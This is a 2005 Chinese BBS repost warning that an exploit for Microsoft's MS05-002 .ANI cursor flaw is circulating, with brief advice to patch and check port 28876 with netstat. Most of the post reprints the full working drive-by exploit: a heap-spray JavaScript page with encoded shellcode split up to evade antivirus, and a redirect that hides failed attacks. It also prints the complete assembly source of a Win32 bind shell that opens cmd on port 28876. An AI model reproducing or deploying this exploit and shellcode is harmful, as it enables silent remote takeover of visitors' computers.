[转载]针对微软1月12日发布漏洞的攻击脚本开始流传
发信人: business (帝国), 信区: hacker
标题: 针对微软1月12日发布漏洞的攻击脚本开始流传
发信站: 兵马俑BBS (Sat Jan 15 13:57:32 2005), 本站(bbs.xjtu.edu.cn)
1月14日，针对微软 MS05-002（Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution，891711）漏洞的攻击脚本开始流传。
该脚本能够在用户浏览某个特定网页时，在用户不知情的情况下利用该漏洞，在用户主机上触发缓冲区溢出。一旦攻击成功，会执行特定的 shellcode：在 28876 端口监听并绑定一个 shell（即 cmd），供攻击者远程连接，从而控制用户主机，进行信息复制、删除等操作，危害极大。
该脚本进行了巧妙伪装：一旦在用户主机上攻击失败，将自动跳转到攻击者指定的某个网页，让用户看到的是正常网页，察觉不到曾被攻击。
建议大家尽快打补丁，并注意升级病毒库。目前我所发现的是 Kaspersky（卡巴斯基）已经可以检查用户浏览的网页，一旦发现有该脚本，自动删除。
同时，在命令行（DOS）窗口下执行 netstat -an，检查 28876 端口或其他异常端口是否处于监听状态。一旦发现，请立刻断开网络，用 U 盘将补丁拷贝到受害机上安装，或者立刻杀毒。
以上仅是个人分析,如有不当欢迎交流。
以下是该脚本和shellcode:
<HTML><!--
________________________________________________________________________________
,sSSSs, Ss, Internet Exploiter 3 v0.2
SS" `YS' '*Ss. .ANI stackoverflow PoC exploit
iS' ,SS" Copyright (C) 2003, 2004 by Berend-Jan Wever.
YS, .ss ,sY" [url]http://www.edup.tudelft.nl/~bjwever[/url]
`"YSSP" sSS <[email]skylined@edup.tudelft.nl[/email]>
________________________________________________________________________________
Credit for the vulnerability:
Yuji Ukai for eEye Digital Security
Patch:
[url]http://www.microsoft.com/technet/security/bulletin/MS05-002.mspx[/url]
Changelog for 3.2:
- Putting the .ANI file in the HEAD sometimes caused the BoF to trigger
before the heap was prepared, fixed that by putting it in the BODY.
- New .ANI file overwrites the stack with a lot of 0x0D bytes, making sure
  it overwrites the return-address no matter where it is on the stack.
  This makes it OS/SP/language independent, thanks to spoonm for the details
  on the .ANI file format.
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
A copy of the GNU General Public License can be found at:
[url]http://www.gnu.org/licenses/gpl.html[/url]
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA 02111-1307
USA.
-->
<SCRIPT language="javascript">
// Win32 MSIE exploit helper script, creates a lot of nopslides to l
and in
// and/or use as return address. Thanks to blazde for feedback and i
dears.
// 4 nops because the 0x0D slide has 5 byte instructions.
shellcode = unescape("%u3737%u3737" +
// Win32 bindshell (port 28876, '\0' free, looping). Thanks to
// HDM and others for inspiration and borrowed code. Source:
// [url]www.edup.tudelft.nl/~bjwever/shellcode/w32_bind_0free_loop.c[/url]
// (Added the "+"-s to fool Norton AV, it would see the
// shellcode as InternetExploiter 1)
"%u43eb"+"%u5756"+"%u458b"+"%u8b3c"+"%u0554"+"%u0178"+"%u52ea" +
"%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf" +
"%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b" +
"%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64" +
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850" +
"%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff" +
"%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22" +
"%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6" +
"%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe" +
"%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031" +
"%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56" +
"%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964" +
"%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353" +
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343" +
"%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031" +
"%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b" +
"%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
// Nopslide will contain these bytes:
bigblock = unescape("%u0D0D%u0D0D");
// Heap blocks in IE have 20 dwords as header
headersize = 20;
// This is all very 1337 code to create a nopslide that will fit exa
ctly
// between the the header and the shellcode in the heap blocks we wa
nt.
// The heap blocks are 0x40000 dwords big, I can't be arsed to write
good
// documentation for this.
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock
;
// And now we can create the heap blocks, we'll create 700 of them t
o spray
// enough memory to be sure enough that we've got one at 0x0D0D0D0D
memory = new Array();
for (i=0;i<700;i++) memory[i] = block + shellcode;
function failed() {
// You can't lose with this exploit.
document.location.href="[url]http://www.margrieta.com[/url]";
}
</SCRIPT>
<BODY style="CURSOR: url('InternetExploiter3.2.ani')" onload="setTimeout
(failed, 1000);">
</BODY>
</HTML>
以下是该 shellcode 的源代码:
int main(void) {
__asm__("
#// output the code to stdout
mov $end-start, %edx #// length
mov $start, %ecx #// source
mov $0x1, %ebx #// stdout
mov $0x4, %eax #// write
int $0x80
jmp end
start:
jmp SkipProcedure
#//Search Procedure with hash %ebx in module %ebp, then jmp to it.
GetProcAddressAndRun:
push %esi
push %edi
mov 0x3c(%ebp), %eax #// eax = PE header offset
mov 0x78(%ebp,%eax), %edx #// edx = exports directory table offset
add %ebp, %edx #// edx = exports directory table address
push %edx
mov 0x20(%edx), %edx #// edx = name pointers table offset
add %ebp, %edx #// edx = name pointers table address
#// Check all names of procedures for the right hash
xor %eax, %eax
xor %ecx, %ecx
ScanProcedureNamesLoop:
inc %ecx
mov (%edx, %ecx, 4), %esi #// esi = name pointer offset
add %ebp, %esi #// esi = name pointer address
xor %edi, %edi
CalculateHashLoop:
ror $0x13, %edi
lodsb
add %eax, %edi
test %eax, %eax
jnz CalculateHashLoop
cmp %ebx, %edi #// check computed hash
jnz ScanProcedureNamesLoop
#// Found, get the address from the table
pop %edx
mov 0x24(%edx), %ebx #// ebx = ordinals table RNA offset
add %ebp, %ebx #// ebx = ordinals table RNA address
mov (%ebx, %ecx, 2), %cx #// ecx = function ordinal
mov 0x1c(%edx), %ebx #// ebx = address table RVA offset
add %ebp, %ebx #// ebx = address table RVA address
mov (%ebx, %ecx, 4), %eax #// eax = address of function RVA offset
add %ebp, %eax #// eax = address of function RVA address
pop %edi
pop %esi
jmp *%eax
#// %edi = LoadLibraryA address
SkipProcedure:
cld
#// Get Kernel32.dll baseaddress in %ebp
xor %eax, %eax
mov %fs:0x30(%eax), %eax #// PEB
#// kernel32.dll is blink in flink of InInitOrder module list
mov 0x0C(%eax), %eax #// PROCESS_MODULE_INFO
mov 0x1C(%eax), %esi #// InInitOrder.flink
lodsl #// eax = InInitOrder.blink
mov 0x08(%eax), %ebp #// ebp = kernel32.dll base address
kernel32BaseDone:
#// LoadLibraryA('ws2_32.dll')
xor %eax, %eax
mov $0x6c6c, %ax
push %eax #//'ll/0/0'
push $0x642e3233 #//'32.d'
push $0x5f327377 #//'ws2_'
push %esp
mov $0xfee8a771, %ebx #// hash LoadLibraryA
call GetProcAddressAndRun
mov %ebp, %edi #// edi = kernel32.dll baseaddress
mov %eax, %ebp #// use ws2_32.dll
#// WSAStartup(0x101, WSADATA)
add $-0x190, %esp
push %esp
xor %eax, %eax
inc %ah
inc %eax
push %eax #// 0x101
mov $0x7dab7d22, %ebx #// hash WSAStartup
call GetProcAddressAndRun
#//serversocket=WSASocketA(af=2, type=1, protocol=0, 0, 0, 0)
xor %eax, %eax
push %eax
push %eax
push %eax
push %eax
inc %eax
push %eax
inc %eax
push %eax
mov $0x793455a6, %ebx #//hash socket
call GetProcAddressAndRun
mov %eax, %esi #// esi = serversocket
#//create struct sockaddr {server_handle=2, port=28876, 0, 0}
xor %eax, %eax
push %eax
push %eax
xor $0xcc700102, %eax
dec %ah
push %eax
mov %esp, %eax #// eax = &sockaddr
push %eax #// > &sockaddr
#//bind(serversocket, &sockaddr, 0x10)
push $0x10
push %eax
push %esi
mov $0xbe2cb481, %ebx #// hash bind
call GetProcAddressAndRun
#//listen(serversocket, 0)
xor %eax, %eax
push %eax
push %esi
mov $0x9b58fad3, %ebx #// hash listen
call GetProcAddressAndRun
pop %eax #// < &sockaddr
mainloop:
pushA
#//clientsocket=accept(serversocket, &sockaddr, &0x10)
push $0x10
push %esp
push %eax
push %esi
mov $0xc656f347, %ebx #// hash accept
call GetProcAddressAndRun
mov %eax, %esi #// %esi = clientsocket
#//Create 'cmd' string on the stack
xor %ebx, %ebx
push %ebx
push $0x646D632e #// '.cmd'
mov %esp, %ecx #// %ecx -> 'cmd'
inc %ecx
xor %ebx, %ebx
#//Create struct STARTUPINFO
# [url]http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dllproc/b[/url]
ase/startupinfo_str.asp
push %esi #// si.stderr = clientsocket
push %esi #// si.stdout = clientsocket
push %esi #// si.stdin = clientsocket
push %ebx #// si.lpReserved2
push %ebx #// si.cbReserved2+si.wShowWindow
xor %eax, %eax
inc %ah #// si.dwFlags = STARTF_USESTD_HANDLES &
&
inc %eax #// STARTF_USESHOWWINDOW
push %eax
push %ebx #// si.dwFillAttribute
push %ebx #// si.dwYCountChars
push %ebx #// si.dwXCountChars
push %ebx #// si.dwYSize
push %ebx #// si.dwXSize
push %ebx #// si.dwY
push %ebx #// si.dwX
push %ebx #// si.lpTitle
push %ebx #// si.lpDesktop
push %ebx #// si.lpReserved
push $0x44 #// si.cb = sizeof(si)
mov %esp, %eax #// %eax -> si
#//Create struct PROCESS_INFORMATION
# [url]http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dllproc/b[/url]
ase/process_information_str.asp
push %ebx #// pi.dwThreadId
push %ebx #// pi.dwProcessId
push %ebx #// pi.hTread
push %ebx #// pi.hProcess
#//CreateProcessA(0, 'cmd', 0, 0, 1, 0, 0, 0, si, pi);
#[url]http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dllproc/ba[/url]
se/creating_a_child_process_with_redirected_input_and_output.asp
push %esp #// -> pi
push %eax #// -> si
push %ebx #// use parent's current directory
push %ebx #// use parent's environment
push %ebx #// creation flags
inc %ebx
push %ebx #// inherit handles (true)
dec %ebx
push %ebx #// primary thread security attributes
push %ebx #// process security attributes
push %ecx #// -> 'cmd'
push %ebx #// NULL
xchg %edi, %ebp #// use kernel32.dll
mov $0xd005d021, %ebx #// hash CreateProcessA
call GetProcAddressAndRun
#// WaitForSingleObject(ProcessHandle, -1);
#[url]http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dllproc/ba[/url]
se/waitforsingleobject.asp
#// %esp points to pi.hProcess so we just need to supply the -1.
pop %ebx #// pi.hProcess
xor %eax, %eax
dec %eax
push %eax #// -1 INFINITE
push %ebx #// pi.hProcess
mov $0x5f8dcb43, %ebx #// hash WaitForSingleObject
call GetProcAddressAndRun
#// closesocket(socket handle);
#// %esp points to the information we saved -8, two pops will take care of t
hat
push %esi
xchg %ebp, %edi
mov $0xd06d6b12, %ebx #// hash closesocket
call GetProcAddressAndRun
#// restore stack and registers and loop.
add $0x5C, %esp
popA
jmp mainloop
#///////////////////////////////////////////////
end:
");
exit(0);
}